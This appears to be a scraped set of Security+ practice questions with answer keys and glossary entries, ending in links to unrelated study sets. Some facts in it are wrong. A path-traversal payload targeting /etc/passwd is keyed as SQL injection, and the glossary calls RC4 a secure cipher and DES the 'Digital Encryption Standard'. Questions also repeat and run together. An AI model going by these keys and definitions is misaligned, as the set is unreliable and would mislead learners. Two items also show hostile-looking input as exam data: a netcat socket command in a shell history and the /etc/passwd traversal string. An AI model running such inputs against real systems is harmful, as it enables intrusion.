QUESTION 120Which of the following scenarios BEST describes an implementation of non-repudiation? A. A user logs into a domain workstation and access network file shares for another department B. A user remotely logs into the mail server with another user's credentials C. A user sends a digitally signed email to the entire finance department about an upcoming meeting D. A user access the workstation registry to make unauthorized changes to enable functionality within an application

Correct Answer: C

QUESTION 123Which of the following would be considered multifactor authentication? A. Hardware token and smart card B. Voice recognition and retina scan C. Strong password and fingerprint D. PIN and security questions

Correct Answer: C

QUESTION 126A security auditor is testing perimeter security in a building that is protected by badge readers. Which of the following types of attacks would MOST likely gain access? A. Phishing B. Man-in-the-middle C. Tailgating D. Watering hole E. Shoulder surfing

Correct Answer: C

QUESTION 127Which of the following encryption methods does PKI typically use to securely protect keys? A. Elliptic curve B. Digital signatures C. Asymmetric D. Obfuscation

Correct Answer: C

QUESTION 128A department head at a university resigned on the first day of the spring semester. It was subsequently determined that the department head deleted numerous files and directories from the server-based home directory while the campus was closed. Which of the following policies or procedures could have prevented this from occurring? A. Time-of-day restrictions B. Permissions auditing and review C. Off boarding D. Account expiration

Correct Answer: C

QUESTION 12Which of the following is used to validate the integrity of data?A. CBCB. BlowfishC. MD5D. RSA

Correct Answer: C

64. A technician is investigating a potentially compromised device with the following symptoms: Browser slowness Frequent browser crashes Hourglass stuck New Search toolbar Increased memory consumption Which of the following types of malware has infected the system? a. Man in the middle b. Spoofer c. Spyware d. Adware

QUESTION 139Which of the followings the BEST reason to run an untested application is a sandbox? A. To allow the application to take full advantage of the host system's resources and storage B. To utilize the host systems antivirus and firewall applications instead of running it own protection C. To prevent the application from acquiring escalated privileges and accessing its host system D. To increase application processing speed so the host system can perform real-time logging

Correct Answer: C

QUESTION 15A company was recently audited by a third party. The audit revealed the company's network devices weretransferring files in the clear. Which of the following protocols should the company use to transfer files?A. HTTPSB. LDAPSC. SCPD. SNMPv3

Correct Answer: C

QUESTION 17 Users in a corporation currently authenticate with a username and password. A security administrator wishes to implement two-factor authentication to improve security. Which of the following authentication methods should be deployed to achieve this goal? A. PIN B. Security question C. Smart card D. Passphrase E. CAPTCHA

Correct Answer: C

QUESTION 17A cybersecurity analyst is looking into the payload of a random packet capture file that was selected foranalysis. The analyst notices that an internal host had a socket established with another internal host over anon-standard port. Upon investigation, the origin host that initiated the socket shows this output:usera@host>historymkdir /local/usr/bin/somedirectorync -1 192.168.5.1 -p 9856ping -c 30 8.8.8.8 -a 600rm /etc/dir2/somefilerm -rm /etc/dir2/traceroute 8.8.8.8pakill pid 9487usera@host>Given the above output, which of the following commands would have established the questionable socket?A. traceroute 8.8.8.8B. ping -1 30 8.8.8.8 -a 600C. nc -1 192.168.5.1 -p 9856D. pskill pid 9487

Correct Answer: C

QUESTION 21 A company is evaluating cloud providers to reduce the cost of its internal IT operations. The company's aging systems are unable to keep up with customer demand. Which of the following cloud models will the company MOST likely select? A. PaaS B. SaaS C. IaaS D. BaaS

Correct Answer: C

QUESTION 24The help desk received a call after hours from an employee who was attempting to log into the payroll serverremotely. When the help desk returned the call the next morning, the employee was able to log into the serverremotely without incident. However, the incident occurred again the next evening. Which of the following BESTdescribes the cause of the issue?A. The password expired on the account and needed to be resetB. The employee does not have the rights needed to access the database remotelyC. Time-of-day restrictions prevented the account from logging inD. The employee's account was locked out and needed to be unlocked

Correct Answer: C

QUESTION 29 Which of the following BEST describes an important security advantage yielded by implementing vendor diversity? A. Sustainability B. Homogeneity C. Resiliency D. Configurability

Correct Answer: C

QUESTION 31An active/passive configuration has an impact on:A. confidentialityB. integrityC. availabilityD. non-repudiation

Correct Answer: C

QUESTION 32 A vice president at a manufacturing organization is concerned about desktops being connected to the network. Employees need to log onto the desktops' local account to verify that a product is being created within specifications; otherwise, the desktops should be as isolated as possible. Which of the following is the BEST way to accomplish this? A. Put the desktops in the DMZ.B. Create a separate VLAN for the desktops. C. Air gap the desktops. D. Join the desktops to an ad-hoc network.

Correct Answer: C

QUESTION 32Which of the following attack types BEST describes a client-side attack that is used to manipulate an HTMLiframe with JavaScript code via a web browser?A. Buffer overflowB. MITMC. XSSD. SQLi

Correct Answer: C

QUESTION 33An in-house penetration tester has been asked to evade a new DLP system. The tester plans to exfiltrate datathrough steganography. Discovery of which of the following would help catch the tester in the act?A. Abnormally high numbers of outgoing instant messages that contain obfuscated textB. Large-capacity USB drives on the tester's desk with encrypted zip filesC. Outgoing emails containing unusually large image filesD. Unusual SFTP connections to a consumer IP address

Correct Answer: C

QUESTION 34 A member of the admins group reports being unable to modify the "changes" file on a server. The permissions on the file are as follows: Permissions User Group File-rwxrw-r--+ Admins Admins changes Based on the output above, which of the following BEST explains why the user is unable to modify the"changes" file?A. The SELinux mode on the server is set to "enforcing." B. The SELinux mode on the server is set to "permissive." C. An FACL has been added to the permissions for the file. D. The admins group does not have adequate permissions to access the file.

Correct Answer: C

QUESTION 34A security analyst receives an alert from a WAF with the following payload:var data = "<test test test> ++ <../../../../../../etc/passwd>"Which of the following types of attacks is this?A. Cross-site request forgeryB. Buffer overflowC. SQL injectionD. JavaScript data insertionE. Firewall evasion script

Correct Answer: C

QUESTION 35Which of the following uses precomputed hashes to guess passwords?A. IptablesB. NAT tablesC. Rainbow tablesD. ARP tables

Correct Answer: C

QUESTION 38A company is deploying smartphones for its mobile salesforce. These devices are for personal and businessuse but are owned by the company. Sales personnel will save new customer data via a custom applicationdeveloped for the company. This application will integrate with the contact information stored in thesmartphones and will populate new customer records onto it. The customer application's data is encrypted atrest, and the application's connection to the back office system is considered secure. The Chief InformationSecurity Officer (CISO) has concerns that customer contact information may be accidentally leaked due to thelimited security capabilities of the devices and the planned controls. Which of the following will be the MOSTefficient security control to implement to lower this risk?A. Implement a mobile data loss agent on the devices to prevent any user manipulation with the contactinformation.B. Restrict screen capture features on the devices when using the custom application and the contactinformation.C. Restrict contact information storage dataflow so it is only shared with the customer application.D. Require complex passwords for authentication when accessing the contact information.

Correct Answer: C

GRE

Generic Routing Encapsulation. A tunneling protocol developed by Cisco Systems.

QUESTION 35 A penetration tester is conducting an assessment on Comptia.org and runs the following command from a coffee shop while connected to the public Internet:c:\nslookup -querytype=MX comptia.orgServer: UnknownAddress: 198.51.100.45comptia.org MX preference=10, mail exchanger = 92.68.102.33comptia.org MX preference=20, mail exchanger = exchg1.comptia.orgexchg1.comptia.org internet address = 192.168.102.67Which of the following should the penetration tester conclude about the command output?A. The public/private views on the Comptia.org DNS servers are misconfigured. B. Comptia.org is running an older mail server, which may be vulnerable to exploits. C. The DNS SPF records have not been updated for Comptia.org. D. 192.168.102.67 is a backup mail server that may be more vulnerable to attack.

Correct Answer: D

QUESTION 37In determining when it may be necessary to perform a credentialed scan against a system instead of a noncredentialedscan, which of the following requirements is MOST likely to influence its decisions?A. The scanner must be able to enumerate the host OS of devices scannerB. The scanner must be able to footprint the networkC. The scanner must be able to check for open ports with listening servicesD. The scanner must be able to audit file system permissions

Correct Answer: D

QUESTION 39The Chief Information Security Officer (CISO) is asking for ways to protect against zero-day exploits. The CISOis concerned that an unrecognized threat could compromise corporate data and result in regulatory fines aswell as poor corporate publicity. The network is mostly flat, with split staff/guest wireless functionality. Which ofthe following equipment MUST be deployed to guard against unknown threats?A. Cloud-based antivirus solution, running as local admin, with push technology for definition updatesB. Implementation of an off-site datacenter hosting all company data, as well as deployment of VDI for all clientcomputing needsC. Host-based heuristic IPS, segregated on a management VLAN, with direct control of the perimeter firewallACLsD. Behavior-based IPS with a communication link to a cloud-based vulnerability and threat feed

Correct Answer: D

QUESTION 41A security analyst is investigating a potential reach. Upon gathering, documenting, and securing the evidence,which of the following actions is the NEXT step to minimize the business impact?A. Launch an investigation to identify the attacking hostB. Initiate the incident response planC. Review lessons learned captured in the processD. Remove malware and restore the system to normal operation

Correct Answer: D

QUESTION 41An organization identifies a number of hosts making outbound connections to a known malicious IP over portTCP 80. The organization wants to identify the data being transmitted and prevent future connections to this IP.Which of the following should the organization do to achieve this outcome?A. Use a protocol analyzer to reconstruct the data and implement a web-proxy.B. Deploy a web-proxy and then blacklist the IP on the firewall.C. Deploy a web-proxy and implement IPS at the network edge.D. Use a protocol analyzer to reconstruct the data and blacklist the IP on the firewall.

Correct Answer: D

QUESTION 45A forensic expert is given a hard drive from a crime scene and is asked to perform an investigation. Which ofthe following is the FIRST step the forensic expert needs to take the chain of custody?A. Make a forensic copyB. Create a hash of the hard riveC. Recover the hard drive dataD. Update the evidence log

Correct Answer: D

QUESTION 46An incident response manager has started to gather all the facts related to a SIEM alert showing multiplesystems may have been compromised. The manager has gathered these facts:The breach is currently indicated on six user PCsOne service account is potentially compromisedExecutive management has been notifiedIn which of the following phases of the IRP is the manager currently working?A. RecoveryB. EradicationC. ContainmentD. Identification

Correct Answer: D

QUESTION 47A stock trading company had the budget for enhancing its secondary datacenter approved. Since the main siteis a hurricane-affected area and the disaster recovery site is 100 mi (161 km) away, the company wants toensure its business is always operational with the least amount of man hours needed. Which of the followingtypes of disaster recovery sites should the company implement?A. Hot siteB. Warm siteC. Cold siteD. Cloud-based site

Correct Answer: D

QUESTION 48A systems administrator is attempting to recover from a catastrophic failure in the datacenter. To recover thedomain controller, the systems administrator needs to provide the domain administrator credentials. Which ofthe following account types is the system administrator using?A. Shared accountsB. Guest accountC. Service accountD. User account

Correct Answer: D

QUESTION 4An administrator is replacing a wireless router. The configuration of the old wireless router was not documentedbefore it stopped functioning. The equipment connecting to the wireless network uses older legacy equipmentthat was manufactured prior to the release of the 802.11i standard. Which of the following configuration optionsshould the administrator select for the new wireless router?A. WPA+CCMPB. WPA2+CCMPC. WPA+TKIPD. WPA2+TKIP

Correct Answer: D

QUESTION 54The computer resource center issue smartphones to all first-level and above managers. The managers havethe ability to install mobile tools. Which of the following tools should be implemented with the type of tools themanagers installed?A. Download managerB. Content managerC. Segmentation managerD. Application manager

Correct Answer: D

QUESTION 55A security engineer is configuring a wireless network with EAP-TLS. Which of the following activities is arequirement for this configuration?A. Setting up a serverB. Configuring federation between authentication serversC. Enabling TOTPD. Deploying certificates to endpoint devices

Correct Answer: D

QUESTION 55A systems administrator wants to provide for and enforce wireless access accountability during events whereexternal speakers are invited to make presentations to a mixed audience of employees and non-employees.Which of the following should the administrator implement?A. Shared accountsB. Preshared passwordsC. Least privilegeD. Sponsored guest

Correct Answer: D

QUESTION 56Ann is the IS manager for several new systems in which the classification of the systems' data are beingdecided. She is trying to determine the sensitivity level of the data being processed. Which of the followingpeople should she consult to determine the data classification?A. StewardB. CustodianC. UserD. Owner

Correct Answer: D

EAP

Extensible Authentication Protocol. An authentication framework that provides general guidance for authentication methods. Variations include LEAP and PEAP

QUESTION 58A systems administrator wants to generate a self-signed certificate for an internal website. Which of thefollowing steps should the systems administrator complete prior to installing the certificate on the server?A. Provide the private key to a public CA.B. Provide the public key to the internal CA.C. Provide the public key to a public CA.D. Provide the private key to the internal CA.E. Provide the public/private key pair to the internal CA.F. Provide the public/private key pair to a public CA.

Correct Answer: D

QUESTION 59A new Chief Information Officer (CIO) has been reviewing the badging and decides to write a policy that allemployees must have their badges rekeyed at least annually. Which of the following controls BEST describesthis policy?A. PhysicalB. CorrectiveC. TechnicalD. Administrative

Correct Answer: D

QUESTION 61A security engineer wants to implement a site-to-site VPN that will require SSL certificates for mutualauthentication. Which of the following should the engineer implement if the design requires client MACaddresses to be visible across the tunnel?A. Tunnel mode IPSecB. Transport mode VPN IPSecC. L2TPD. SSL VPN

Correct Answer: D

QUESTION 63A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decreasethe risk of users jailbreaking mobile devices?A. Install a corporately monitored mobile antivirus on the devices.B. Prevent the installation of applications from a third-party application store.C. Build a custom ROM that can prevent jailbreaking.D. Require applications to be digitally signed.

Correct Answer: D

QUESTION 71A Chief Information Officer (CIO) has decided it is not cost effective to implement safeguards against a knownvulnerability. Which of the following risk responses does this BEST describe?A. TransferenceB. AvoidanceC. MitigationD. Acceptance

Correct Answer: D

QUESTION 72An audit takes place after company-wide restructuring, in which several employees changed roles. Thefollowing deficiencies are found during the audit regarding access to confidential data.Employee Job Function Audit FindingAnn Sales Manager *Access to confidential payroll shares*Access to payroll processing program*Access to marketing sharesJeff Marketing Director *Access to human resources annual review folder*Access to shared human resources mailboxJohn Sales Manager *Active account*Access to human resources annual review folder*Access to confidential payroll sharesWhich of the following would be the BEST method to prevent similar audit finding in the future?A. Implement separation of duties for the payroll departmentB. Implement a DLP solution on the payroll and human resources reviewsC. Implement rule-based access controls on the human resources serverD. Implement regular permission auditing and reviews

Correct Answer: D

QUESTION 74A penetration tester has written an application that performs a bit-by-bit XOR 0xFF operation on binaries priorto transmission over untrusted media. Which of the following BEST describes the action performed by this typeof application?A. HashingB. Key exchangeC. EncryptionD. Obfusication

Correct Answer: D

QUESTION 80A technician is configuring a load balancer for the application team to accelerate the network performance of their applications. The applications are hosted on multiple servers and must be redundant. Given this scenario, which of the following would be the BEST method of configuring the load balancer? A. Round-robin B. Weighted C. Least connection D. Locality-based

Correct Answer: D

QUESTION 81Ann is the IS manager for several new systems in which the classifications of the systems' data are being decided. She is trying to determine the sensitivity level of the data being processed. Which of the following people should she consult to determine the data classification? A. Steward B. Custodian C. User D. Owner

Correct Answer: D

QUESTION 86A security analyst is hardening a WiFi infrastructure. The primary requirements are the following:The infrastructure must allow staff to authenticate using the most secure method.The infrastructure must allow guests to use an "open" WiFi network that logs valid email addresses beforegranting access to the Internet.Given these requirements, which of the following statements BEST represents what the analyst shouldrecommend and configure?A. Configure a captive portal for guests and WPS for staff.B. Configure a captive portal for staff and WPA for guests.C. Configure a captive portal for staff and WEP for guests.D. Configure a captive portal for guest and WPA2 Enterprise for staff.

Correct Answer: D

QUESTION 95 A business sector is highly competitive, and safeguarding trade secrets and critical information is paramount.On a seasonal basis, an organization employs temporary hires and contractor personnel to accomplish its mission objectives. The temporary and contract personnel require access to network resources only when on the clock. Which of the following account management practices are the BEST ways to manage these accounts? A. Employ time-of-day restrictions.B. Employ password complexity.C. Employ a random key generator strategy.D. Employ an account expiration strategy.E. Employ a password lockout policy.

Correct Answer: D

QUESTION 96 Which of the following locations contain the MOST volatile data?A. SSDB. Paging file C. RAMD. Cache memory

Correct Answer: D

QUESTION 144 A systems administrator wants to implement a wireless protocol that will allow the organization to authenticate mobile devices prior to providing the user with a captive portal login. Which of the following should the systems administrator configure? A. L2TP with MAC filtering B. EAP-TTLS C. WPA2-CCMP with PSK D. RADIUS federation

Correct Answer: D RADIUS generally includes 802.1X that pre-authenticates devices.

QUESTION 141A company is performing an analysis of the corporate enterprise network with the intent of identifying what will cause losses in revenue, referrals, and/or reputation when out of commission. Which of the following is an element of a BIA that is being addressed? A. mission-essential function B. Single point of failure C. backup and restoration plans D. Identification of critical systems

Correct Answer: D The BIA is composed of the following three steps: Determine mission/business processes and recovery criticality. Mission/business processes supported by the system are identified and the impact of a system disruption to those processes is determined along with outage impacts and estimated downtime.

6. A system administrator is attempting to recover from a catastrophic failure in the datacenter. To recover the domain controller, the systems administrator needs to provide the domain administrators credentials. Which of the following account types is the system administrator using? a. Shared account b. Guest account c. Service Account d. User account

QUESTION 136Security administrators attempted corrective action after a phishing attack. Users are still experiencing trouble logging in, as well as an increase in account lockouts. Users' email contacts are complaining of an increase in spam and social networking requests. Due to a large number of affected accounts, remediation must be accomplished quickly. Which of the following actions should be taken FIRST? (Select TWO)A. Disable the compromised accounts B. Update WAF rules to block social networks C. Remove the compromised accounts with all AD groups D. Change the compromised accounts' passwords E. Disable the open relay on the email server F. Enable sender policy framework

Correct Answer: EF Sender Policy Framework (SPF) is a simple email-validation system designed to detect email spoofing by providing a mechanism to allow receiving mail exchangers to check that incoming mail from a domain comes from a host authorized by that domain's administrators and a Small Business Server environment, you may have to prevent your Microsoft Exchange Server-based server from being used as an open relay SMTP server for unsolicited commercial e-mail messages, or spam. You may also have to clean up the Exchange server's SMTP queues to delete the unsolicited commercial email messages. If your Exchange server is being used as an open SMTP relay, you may experience one or more of the following symptoms:- The Exchange server cannot deliver outbound SMTP mail to a growing list of e-mail domains.- Internet browsing is slow from the server and from the local area network (LAN) clients.- Free disk space on the Exchange server in the location of the Exchange information store databases or the exchange information store transaction logs is reduced more rapidly than you expect.- The Microsoft Exchange information store databases spontaneously dismount. You may be able to manually mount the stores by using Exchange System Manager, but the stores may dismount on their own after they run for a short time. For more information, click the following article number to view the article in the Microsoft Knowledge Base:

CCMP

Counter Mode with Cipher Block Chaining Message Authentication Code Protocol. An encryption protocol based on AES used with WPA2 for wireless security. It is more secure then TKIP, used with the original release of WPA.

XSRF

Cross-site request forgery. An attack that causes users to perform actions on websites without their knowledge. In some cases, attackers use header manipulation to steal cookies and harvest passwords.

XSS

Cross-site scripting. It scripting allows an attacker to redirect users to malicious websites and steal cookies. E-mail can include an embedded HTML image object or a JavaScript image tag as part of a malicious cross-site scripting attack. Websites prevent cross-site scripting attacks with input validation to detect and block input that include HTML and JavaScript tags. Many sites prevent the use of < and > characters to block cross-site scripting.

CRC

Cyclical Redundancy Check. An error detection code used to detect accidental changes that can affect the integrity of data.

21. When attackers use a compromised host as a platform for launching attacks deeper into a company's network, it is said they are: a. Escalating privilege b. Becoming persistent c. Fingerprinting d. Pivoting

23. Which of the following would provide additional security by adding another factor to a smart card? a. Token b. Proximity badge c. Physical key d. PIN

27. A security technician has been receiving alerts from several servers that indicate load balancers have had a significant increase in traffic. The technician initiates a system scan. The scan results illustrate that the disk space on several servers has reached capacity. The scan also indicates that incoming internet traffic to the servers has increased. Which of the following is the most likely cause of the decreased disk space? a. Misconfigured devices b. Log and events anomalies c. Authentication issues d. unauthorized software

30. A security analyst receives an alert from a WAF with the following payload: var data = "<test test test> ++ <../../../../../etc/passwd>" Which of the following types of attack is this? a. Cross site forgery b. Buffer Overflow c. SQL injection d. JavaScript data insertion e. Firewall evasion script

32. A security engineer wants to implement a site to site VPN that will require SSL certificates for mutual authentication. Which of the following should the engineer implement if the design requires client MAC addresses to be visible across the tunnel? a. Tunnel mode IPSec b. Transport mode VPN IPSec c. L2TP d. SSL VPN

39. A security analyst is investigating a potential breach. Upon gathering, documenting and securing the evidence, which of the following actions is the next step to minimize the business impact? a. Launch an investigation to identify the attacking host b. Initiate the incident response plan c. Review lessons learned captured in the process d. Remove malware and restore the system to normal operation

4. A penetration tester has written an application that performs a bit by bit XOR OxFF operation on binaries prior to transmission over trusted media. Which of the following best describes the action performed by this type of application? a. Hashing b. Key Exchange c. Encryption d. Obfuscation

40. The computer resource center issued smartphones to all first level and above managers. The managers have the ability to install mobile tools. Which of the following tools should be implement to control the types of tools the managers install? a. Download manager b. Content Manager c. Segmentation Manager d. Application Manager

43. The company has a policy that all of the employees must have their badges rekeyed at least annually. Which of the following describes this policy? a. Physical b. Corrective c. Technical d. Administrative

51. Which of the following attack best describes a client side attack that is used to manipulate an HTML iframe with JavaScript code via a web browser? a. Buffer overflow b. MITM c. XSS d. SQLi

52. A home invasion occurred recently in which an intruder compromised a home network and accessed a WIFI enabled baby monitor while the baby's parents were sleeping. Which of the following best describes how the intruder accessed the monitor? a. Outdated virus b. WIFI signal strength c. Social engineering d. Default configurations

53. To help prevent one job role from having sufficient access to create, modify and approve payroll data, which of the following practices should be employed? a. Least privilege b. Job rotation c. Background checks d. Separation of duties

59. Which of the following types of social engineering attacks targets Chief Information Officers over email? a. Whaling b. Vishing c. Tailgating d. Spear Phishing

XML

Extensible markup language. Used by many databases for inputting or exporting data. XML uses formatting rules to describe the data.

72. An audit takes place after company-wide restructuring, in which several employees changed roles. The following deficiencies are found during the audit regarding access to confidential data: Employee Job Function Audit Finding Ann Sales manager Access to confidential payroll shares Access to payroll processing program Access to marketing shares Jeff Marketing director Access to human resources annual review folder Access to shared human resources mailbox John Sales manager (terminated) Active account Access to human resources annual review folder Access to confidential payroll shares Which of the following would be the BEST method to prevent similar audit findings in the future? a. Implement separation of duties for the payroll department b. Implement a DLP solution on the payroll and HR servers c. Implement rule-based access controls on the HR server d. Implement regular permission auditing and reviews

47. A security administrator is diagnosing a server where the CPU utilization is at 100% for 24 hours. The main culprit of CPU utilization is the antivirus program. Which of the following issues could occur if left unresolved? Choose two. a. MITM attack b. DoS attack c. DLL injection# d. Buffer overflow e. Resource exhaustion

D,E

DEP

Data Execution Prevention. A security feature in some operating systems. It helps prevent an application or service from executing code from a nonexecutable memory region

DLP

Data Loss Protection. A network-based DLP system can examine and analyze network traffic. It can detect if confidential company data or any PII data is included in e-mail and reduce the risk of internal users e-mailing sensitive data outside the organization.

DMZ

Demilitarized zone. Area between two firewalls separating the Internet and an internal network. A DMZ provides a layer of protection for Internet-facing servers. It allows access to a server or service for Internet users while segmenting and protecting access to the internal network.

DoS

Denial-of-service. An attack from a single source that attempts to disrupt the services provided by another system. Examples include SYN flood, smurf, and some buffer overflow attacks. Compare to DDoS.

DES

Digital Encryption Standard. An older symmetric encryption standard used to provide confidentiality. DES uses 56 bits and is considered cracked.

DSA

Digital Signature Algorithm. A digital signature is an encrypted hash of a message. The sender's private key encrypts the hash of the message to create the digital signature. The recipient decrypts the hash with the sender's public key, and, if successful, it provides authentication, non-repudiation, and integrity. Authentication identifies the sender. Integrity verifies the message has not been modified. Non-repudiation is used with online transactions and prevents the sender from later denying they sent the e-mail.

DRP

Disaster recovery plan. A document designed to help a company respond to disasters, such as hurricanes, floods, and fires. It includes a hierarchical list of critical systems and often prioritizes services to restore after an outage. Testing validates the plan. Recovered systems are tested before returning them to operation, and this can include a comparison to baselines. The final phase of disaster recovery includes a review to identify any lessons learned and may include an update of the plan.

DACL

Discretionary Access Control List. List of Access Control Entries (ACEs) in Microsoft's NTFS. Each ACE includes a security identifier (SID) and a permission.

DAC

Discretionary Access Control. An access control model where all objects have owners and owners can modify permissions for the objects (files and folders). Microsoft's NTFS uses the DAC model. Other access control models are MAC and RBAC.

RAID-1

Disk mirroring. RAID-1 uses two disks and provides fault tolerance.

RAID-5

Disk striping with parity. RAID-5 uses three or more disks and provides fault tolerance.

RAID-0

Disk striping. RAID-0 improves performance but does not provide fault tolerance.

DDoS

Distributed denial-of-service. An attack on a system launched from multiple sources intended to make a computer's resources or services unavailable to users. DDoS attacks are often launched from zombies in botnets. DDoS attacks typically include sustained, abnormally high network traffic. A performance baseline helps administrators detect a DDoS. Compare to DoS.

DNS

Domain Name System. Used to resolve host names to IP addresses. DNS is the primary name resolution service used on the Internet and is also used on internal networks. DNS uses port 53. DNS poisoning attempts to modify or corrupt cached DNS results. A pharming attack is a specific type of DNS poisoning attack that redirects a website's traffic to another website.

DHCP

Dynamic Host Configuration Protocol. A service used to dynamically assign TCP/IP configuration information to clients. DHCP is often used to assign IP addresses, subnet masks, default gateways, DNS server addresses, and much more.

What is a DLL?

Dynamic Link Library. A compiled set of code that can be called from other programs.

EMI

Electromagnetic interference. Interference caused by motors, power lines, and fluorescent lights. Cables can be shielded to protect signals from EMI. Additionally, EMI shielding prevents signal emanation, so it can prevent someone from capturing network traffic.

ECC

Elliptic curve cryptography. An asymmetric encryption algorithm commonly used with smaller wireless devices. It uses smaller key sizes and requires less processing power than many other encryption methods

ESP

Encapsulating Security Protocol. IPsec includes both AH and ESP. AH provides authentication and integrity, and ESP provides confidentiality, integrity, and authentication. ESP is identified with protocol ID number 50.

EFS

Encrypting File System. A feature within NTFS on Windows systems that supports encrypting individual files or folders for confidentiality.

XTACACS

Extended Terminal Access Controller Access-Control System. An improvement over TACACS developed by Cisco Systems and proprietary to Cisco systems. TACACS+ is more commonly used.

QUESTION 14 When it comes to cloud computing, if one of the requirements for a project is to have the most control over the systems in the cloud, which of the following is a service model that would be BEST suited for this goal? A. Infrastructure as a Service B. Platform as a Service C. Software as a Service D. Virtualization as a Service

RIPEMD

RACE Integrity Primitives Evaluation Message Digest. A hash function used for integrity. It creates fixed length hashes of 128, 160, 256, or 320 bits.

RFI

Radio frequency interference. Interference from RF sources such as AM or FM transmitters. RFI can be filtered to prevent data interference, and cables can be shielded to protect signals from RFI.

RAM

Random Access Memory. Volatile memory within a computer that holds active processes, data, and applications. Data in RAM is lost when the computer is turned off. Inspection of RAM can discover hooked processes from rootkits. Memory forensics analyzes data in RAM.

RSTP

Rapid Spanning Tree Protocol. An improvement over STP. STP and RSTP protocols are enabled on most switches and protect against switching loops, such as those caused when two ports of a switch are connected together.

RTP

Real-time Transport Protocol. A standard used for delivering audio and video over an IP network.

RPO

Recovery Point Objective. A Recovery Point Objective identifies a point in time where data loss is acceptable. It is related to the RTO and the BIA often includes both RTOs and RPOs.

RTO

Recovery Time Objective. An RTO identifies the maximum amount of time it can take to restore a system after an outage. It is related to the RPO and the BIA often includes both RTOs and RPOs.

Recovery agent. A designated individual who can recover or restore cryptographic keys. In the context of a PKI, a recovery agent can recover private keys to access encrypted data.

RAID

Redundant Array of Inexpensive (or Independent) Disks. Multiple disks added together to increase performance or provide protection against faults.

RAS

Remote Access Service. A server used to provide access to an internal network from an outside location. RAS is also known as Remote Access Server and sometimes referred to as Network Access Service (NAS).

RADIUS

Remote Authentication Dial-In User Service. Provides central authentication for remote access clients. RADIUS encrypts the password packets and uses UDP. In contrast, TACACS+ encrypts the entire authentication process and uses TCP.

RBAC

Role-based access control. An access control model that uses roles to define access and it is often implemented with groups. A user account is placed into a role, inheriting the rights and permissions of the role. Other access control models are MAC and DAC.

Ron's Code or Rivest's Cipher. Symmetric encryption algorithm that includes versions RC2, RC4, RC5, and RC6. RC4 is a secure stream cipher, and RC5 and RC6 are block ciphers.

RBAC

Rule-based access control. An access control model that uses rules to define access. Rule-based access control is based on a set of approved instructions, such as an access control list. Other access control models are MAC and DAC.

SFTP

Secure FTP. An extension of Secure Shell (SSH) using SSH to transmit the files in an encrypted format. SFTP transmits data using port 22.

SHA

Secure Hash Algorithm. A hashing function used to provide integrity. SHA1 uses 160 bits, and SHA-256 uses 256 bits. Hashing algorithms always provide a fixed-size bit-string regardless of the size of the hashed data. By comparing the hashes at two different times, you can verify integrity of the data.

SHTTP

Secure Hypertext Transfer Protocol. An alternative to HTTPS. Infrequently used.

SSH

Secure Shell. SSH encrypts a wide variety of traffic such as Secure File Transfer Protocol (SFTP), Telnet, and Secure Copy (SCP). SSH uses port 22.

SSTP

Secure Socket Tunneling Protocol. A tunneling protocol that encrypts VPN traffic using SSL over port 443.

SSL

Secure Sockets Layer. Used to encrypt traffic on the wire. SSL is used with HTTPS to encrypt HTTP traffic on the Internet using both symmetric and asymmetric encryption algorithms. SSL uses port 443 when encrypting HTTPS traffic.

SCP

Secure copy. Based on SSH, SCP allows users to copy encrypted files over a network. SCP uses port 22.

S/MIME

Secure/Multipurpose Internet Mail Extensions. Used to secure e-mail. S/MIME provides confidentiality, integrity, authentication, and non-repudiation. It can digitally sign and encrypt e-mail, including the encryption of e-mail at rest (stored on a drive) and in transit (data sent over the network). It uses RSA, with public and private keys for encryption and decryption, and depends on a PKI for certificates.

SCAP

Security Content Automation Protocol. A method with automated vulnerability management, measurement, and policy compliance evaluation tools

SIRT

Security Incident Response Team. A group of experts that respond to security incidents. Also known as CERT, CERT, or IRT.

SID

Security identifier. Unique set of numbers and letters used to identify each user and each group in Microsoft environments.

SELinux

Security-Enhanced Linux. A trusted operating system platform that prevents malicious or suspicious code from executing on both Linux and UNIX systems. It is one of the few operating systems that use the MAC model.

Security Plus Study Question v1

Ensembles d'études connexes

Integumentary System

WW1 Unit Test, WWI History Test Notes, Historical Concepts

اصول الفقة، م٤

life insurance

PrepU Adult 2 Assignment 20

Insurance Terms & Concepts

Chapter 12 - Law of Agency

Microbiology Ch.5-7

ECON 204 Quizzes 1-7

ACCT 439 Chapter 13

Personal Finance - FIN 1100

Negotiation Homework ?s

Finance- Chapter 3 and 4

PAIN

3306 chapter 9

Python Final

Farm Business

Mgmt final

REL 102 Buddhism

Chapter 18: Shareholders' Equity